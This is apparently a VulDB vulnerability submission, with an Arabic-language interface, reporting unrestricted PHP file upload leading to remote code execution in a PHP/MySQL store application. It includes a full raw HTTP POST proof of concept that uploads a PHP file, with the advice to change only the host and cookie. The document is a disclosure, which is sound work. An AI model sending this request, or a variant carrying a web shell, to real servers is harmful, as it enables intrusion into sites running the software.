إرسال #109687: Online Computer and Laptop Store Background RCEالمعلومات

عنوانOnline Computer and Laptop Store Background RCE
الوصفBrief description: Online Computer and Laptop Store Background RCE reason:After uploading the file in the background code php-ocls\admin\system_info\index.php and clicking upload, the specific execution code location is: php-ocls\classes\SystemSettings.php There is no limit, just upload php directly to cause the execution file of RCE payload:Just modify the host and cookie in the payload --------------------------------------------------------------------------------------------------------------------------- POST /php-ocls/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: 192.168.5.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------107417980941863249932677197760 Content-Length: 185 Origin: http://localhost Connection: keep-alive Referer: http://localhost/php-ocls/admin/?page=system_info Cookie: PHPSESSID=pu8agldg93unebq0kmn6upugn3 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------107417980941863249932677197760 Content-Disposition: form-data; name="img"; filename="1.php" Content-Type: application/octet-stream <?php phpinfo();?> ---------------------------------------------------------------------------------------------------------------------------
المصدر⚠️ www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
المستخدم
 jsbae3449 (UID 30775)
ارسال03/04/2023 06:11 PM (3 سنوات منذ)
الاعتدال04/04/2023 10:36 AM (16 hours later)
الحالةتمت الموافقة
إدخال VulDB224841 [SourceCodester Online Computer and Laptop Store 1.0 index.php img تجاوز الصلاحيات]
النقاط17

التالي نظرة عامة السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!